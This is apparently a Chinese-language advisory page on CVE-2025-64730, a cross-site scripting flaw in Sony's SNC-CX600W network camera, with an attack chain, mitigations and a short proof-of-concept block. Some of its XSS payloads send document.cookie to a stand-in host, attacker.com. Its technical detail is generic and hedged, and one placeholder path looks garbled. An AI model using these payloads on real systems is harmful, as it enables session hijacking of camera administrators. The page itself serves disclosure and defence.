IPBUF安全漏洞报告
English
CVE-2025-64730 CVSS 6.1 中危

CVE-2025-64730 Sony SNC-CX600W 跨站脚本漏洞分析

披露日期: 2025-11-25

漏洞信息

漏洞编号
CVE-2025-64730
漏洞类型
XSS
CVSS评分
6.1 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Sony SNC-CX600W

相关标签

XSS跨站脚本CVE-2025-64730SonySNC-CX600W网络摄像机IP CameraWeb漏洞会话劫持JPCERT

漏洞概述

CVE-2025-64730是索尼网络摄像机SNC-CX600W中存在的一个跨站脚本(XSS)漏洞,CVSS评分为6.1,属于中等严重程度。该漏洞由JPCERT/CC的安全研究人员vultures发现并报告,披露日期为2025年11月25日。漏洞影响SNC-CX600W的所有版本,攻击者无需认证即可利用此漏洞,但需要诱导用户访问恶意链接或页面。由于该摄像机是网络监控设备,通常部署在企业或公共场所,因此漏洞的潜在影响范围较广。攻击者可以通过在Web界面中注入恶意JavaScript代码,窃取用户的会话Cookie、劫持用户账户或进行钓鱼攻击。鉴于该设备常用于敏感场所,如办公室、仓库或公共区域,攻击者可能利用此漏洞进行更高级的侦察活动或横向移动。索尼公司已确认此漏洞的存在,但截至目前尚未发布官方修复补丁,用户需要采取临时防护措施。

技术细节

该漏洞是典型的存储型或反射型跨站脚本(XSS)漏洞,位于SNC-CX600W网络摄像机的Web管理界面中。漏洞根源在于应用程序对用户输入未进行充分的过滤和转义处理。攻击者可以通过构造特制的URL或HTTP请求,在URL参数或表单字段中注入恶意JavaScript代码。当其他用户访问包含恶意代码的页面时,浏览器会将其解析为可执行脚本,从而在用户上下文中执行任意操作。CVSS向量AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N表明攻击复杂度低且无需认证,这大大增加了漏洞的可利用性。攻击者可能利用此漏洞获取摄像机的管理权限、窃取视频流配置信息或进行中间人攻击。由于SNC-CX600W支持远程访问功能,攻击者甚至可以通过互联网发起攻击。

攻击链分析

STEP 1
步骤1
侦察阶段:攻击者识别目标SNC-CX600W摄像机的IP地址或域名,并探测其Web管理界面的可访问端口(通常为80/443端口)
STEP 2
步骤2
漏洞分析:攻击者分析Web应用的输入点,识别未过滤的用户可控参数(如URL参数、表单输入、HTTP头等)
STEP 3
步骤3
载荷构造:攻击者构造包含恶意JavaScript代码的XSS载荷,可能使用编码或混淆技术绕过基本过滤
STEP 4
步骤4
社工攻击:攻击者通过钓鱼邮件、即时消息或其他渠道诱导已登录的管理员点击特制的恶意链接
STEP 5
步骤5
会话劫持:当管理员访问恶意URL时,浏览器执行注入的脚本代码,攻击者获取管理员的会话Cookie
STEP 6
步骤6
权限提升:攻击者利用窃取的会话Cookie冒充管理员身份,访问摄像机管理界面
STEP 7
步骤7
持久化控制:攻击者可以修改摄像机配置、窃取视频流、添加后门账户或进一步横向移动到内网其他系统

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- CVE-2025-64730 XSS PoC for Sony SNC-CX600W --> <!-- This PoC demonstrates a reflected XSS attack --> <!-- Method 1: URL-based XSS injection --> <script>alert(document.cookie)</script> <!-- Method 2: Encoded XSS payload --> <img src=x onerror="fetch('http://attacker.com/steal?cookie='+document.cookie)"> <!-- Method 3: DOM-based XSS --> '><script>document.location='http://attacker.com/phish?data='+document.cookie</script> <!-- Real attack scenario: --> <!-- Attacker crafts a malicious URL like: --> <!-- http://<camera-ip>/web一致/xxx?param=<script>malicious_code</script> --> <!-- Then tricks authenticated user into clicking the link --> <!-- Recommended test commands: --> <!-- curl 'http://<target-ip>/path?param=<script>alert(1)</script>' --> <!-- Check if script executes in browser context -->

影响范围

Sony SNC-CX600W 所有版本

防御指南

临时缓解措施
在官方补丁发布之前,建议采取以下临时缓解措施:1)限制摄像机的互联网暴露,仅允许通过VPN或受信任的网络访问;2)启用HTTPS并配置强加密算法;3)对Web管理界面启用双因素认证;4)定期更换管理员密码并监控账户异常登录;5)使用网络分段技术将摄像机隔离在独立的VLAN中;6)部署入侵检测系统(IDS)监控可疑的HTTP请求;7)考虑暂时禁用远程Web管理功能,仅允许本地网络访问。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表